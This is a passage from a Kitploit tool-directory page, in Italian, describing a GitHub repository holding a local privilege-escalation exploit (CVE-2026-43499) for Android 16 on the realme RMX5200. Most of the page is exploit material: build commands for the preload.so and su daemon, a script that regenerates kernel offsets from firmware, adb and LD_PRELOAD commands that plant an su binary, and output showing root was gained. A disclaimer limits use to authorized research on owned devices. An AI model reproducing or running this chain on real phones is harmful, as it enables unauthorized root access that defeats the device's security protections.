Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-43499-RMX5200 — Exploit di escalation dei privilegi locali per Android 16 su realme RMX5200 che utilizza la catena preload.so basata su LD_PRELOAD per ottenere accesso root temporaneo tramite CVE-2026-43499. | Kitploit
Strumenti/GitHubGitHub/sorrow404null/cve-2026-43499-rmx5200
Sicurezza AndroidEscalation di PrivilegiFramework di ExploitExploitShellcodePost-ExploitSicurezza MobileSviluppo PayloadBinary Exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubsorrow404null/cve-2026-43499-rmx5200

CVE-2026-43499-RMX5200

Exploit di escalation dei privilegi locali per Android 16 su realme RMX5200 che utilizza la catena preload.so basata su LD_PRELOAD per ottenere accesso root temporaneo tramite CVE-2026-43499.

Vedi Repository
61221 mese faNon ancora revisionato

CVE-2026-43499 per realme RMX5200

Escalation locale dei privilegi SO per:

ElementoValore
Dispositivorealme RMX5200 / RE6030L1
Android16
Kernel6.12.23-android16-5-gb2a876903b49-ab14541642-4k
Fingerprintrealme/RMX5200/RE6030L1:16/BP2A.250605.015/...:user/release-keys

Binario precompilato: bin/preload.so

Questo repository contiene solo l'albero di build della SO (sorgenti + offset + precompilato). Nessun harness browser, nessun dump del firmware, nessuno scaffolding di test.

Basato sulla catena pubblica in stile IonStack / popsicle; offset rigenerati da boot.img + xbl_config.img di questo dispositivo.


Layout

root@kitploit:~
.
├── bin/preload.so              # prebuilt aarch64 shared object (verified)
├── generate_target.py          # optional: regenerate target.h from boot+xbl
├── source/
│   ├── Makefile
│   └── src/
│       ├── target.h            # RMX5200 offsets
│       ├── main.c preload.c slide.c ...
│       └── kernelsnitch/
└── README.md

Compilazione

Requisiti:

  • Android NDK (consigliata r27+)
  • Python 3 + llvm-objdump (solo se si rigenera target.h)

Con make

root@kitploit:~
# Linux NDK example
export NDK_ROOT=/path/to/android-ndk
make -C source clean preload

# Windows NDK example
make -C source clean preload \
  NDK_ROOT="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018" \
  NDK_TOOLCHAIN="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018/toolchains/llvm/prebuilt/windows-x86_64"

Output:

root@kitploit:~
source/build/bin/preload.so

Senza make (clang diretto)

root@kitploit:~
cd source
mkdir -p build/bin build/embed
CC="$NDK_TOOLCHAIN/bin/aarch64-linux-android35-clang"

$CC -O2 -Isrc -fPIE -pie -DTARGET_CONFIG_H=\"target.h\" \
  src/su_daemon.c -o build/embed/su_daemon_aarch64_pie

$CC -O2 -Isrc -fPIC -Wno-unused-parameter -Wno-sign-compare -Wno-unused-function \
  -DTARGET_CONFIG_H=\"target.h\" \
  src/main.c src/util.c src/slide.c src/fops.c src/pipe.c \
  src/preload.c src/su_blob.S \
  -shared -o build/bin/preload.so -pthread

Rigenerare gli offset (facoltativo)

Servono immagini firmware corrispondenti (non incluse qui):

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  --llvm-objdump llvm-objdump \
  -o source/src/target.h

Esecuzione

ADB LD_PRELOAD

root@kitploit:~
adb push bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

Catena browser (esterna)

Carica questo preload.so tramite un host in stile Firefox-151 lonStack (ad es. voce dispositivo Rootme). Non incluso in questo repository.

Marcatori di successo:

root@kitploit:~
slide-kaslr-ok
direct credential result uid=0 ...
local su binary ready path=/data/local/tmp/su
direct-root-summary root=1 ...
root@kitploit:~
uid=0(root) gid=0(root) ... context=kernel

Note

  • Root temporanea soltanto — si perde dopo il riavvio.
  • Dopo il successo, alcune app potrebbero non riuscire a inizializzare Framework fino al riavvio (stessa classe di effetto collaterale dei target pubblici correlati).
  • Gli offset sono specifici della build. Altre build OTA richiedono un nuovo target.h / una ricompilazione.
  • Per ricerca di sicurezza autorizzata su dispositivi di tua proprietà.

Crediti

  • Contesto di ricerca pubblica: writeup IonStack / CVE-2026-43499
  • Derivazione implementativa: catena preload.so in stile popsicle
  • Adattamento dispositivo: RMX5200 (RE6030L1)
Scarica lo strumento